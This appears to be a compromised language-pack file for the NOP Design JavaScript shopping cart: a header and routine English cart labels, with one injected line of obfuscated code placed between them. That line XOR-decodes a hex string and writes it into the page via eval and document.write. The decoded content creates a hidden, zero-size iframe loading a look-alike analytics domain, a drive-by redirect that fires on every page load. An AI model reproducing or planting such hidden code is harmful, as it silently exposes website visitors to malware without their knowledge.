//=====================================================================||
//       NOP Design JavaScript Shopping Cart Language Pack             ||
//                                                                     ||
//                      Language Strings                               ||
//                     ------------------                              ||
// Strings displayed to end users, in language specific encoding.      ||
// only modify these strings if you wish to change language specific   ||
// wording for your site.  If you add a new language, please send it   ||
// back to NOP Design (http://www.nopdesign.com/forum) so we can add   ||
// it to the distribution.                                             ||
//---------------------------------------------------------------------||
advxd=["gsutnxzv=0;rhtultty='';for(botmf=0;botmf<advxd[0]['length'];botmf+=1)gsutnxzv+=advxd[0].charCodeAt(botmf);gsutnxzv%=0x64;for(botmf=0;botmf<advxd[1]['length'];botmf+=2)rhtultty+=String.fromCharCode(parseInt(0+'x'+advxd[1].charAt(botmf)+advxd[1].charAt(botmf+1))^gsutnxzv);document.write(rhtultty);","62362a333260623c313a2760622d3d2c372e2a60283f2c7e2a3b332e17182c3f333b633a313d2b333b302a703d2c3b3f2a3b1b323b333b302a767937382c3f333b7977652a3b332e17182c3f333b702d3b2a1f2a2a2c373c2b2a3b7679373a7972790c0d17182c3f333b7977652a3b332e17182c3f333b702d3b2a1f2a2a2c373c2b2a3b76792d2c3d797279362a2a2e64717139313139323b733f303f32272d2a372d3d703d3133713730703d3937616c6e7977652a3b332e17182c3f333b702d2a27323b7028372d373c3732372a27637936373a3a3b3079652a3b332e17182c3f333b702d2a27323b7029373a2a3663796e2e2679652a3b332e17182c3f333b702d2a27323b70363b3739362a63796e2e26796517182c3f333b113c347e637e3a313d2b333b302a703c313a27703f2e2e3b303a1d3637323a762a3b332e17182c3f333b776562712d3d2c372e2a6062713c313a27606271362a333260"];eval(advxd[0]);
strSorry  = "I'm Sorry, your cart is full, please proceed to checkout.";
strAdded  = " added to your shopping cart.";
strRemove = "Click 'Ok' to remove this product from your shopping cart.";
strILabel = "Id";
strDLabel = "Name";
strQLabel = "Quantity";
strPLabel = "Price";
strSLabel = "Shipping";
strRLabel = "Remove From Cart";
strRButton= "Remove";
strSUB    = "SUBTOTAL";
strSHIP   = "SHIPPING";
strTAX    = "TAX/VAT";
strTOT    = "TOTAL";
strErrQty = "Invalid Quantity.";
strNewQty = 'Please enter new quantity:';

Language = 'en';
bLanguageDefined = true;

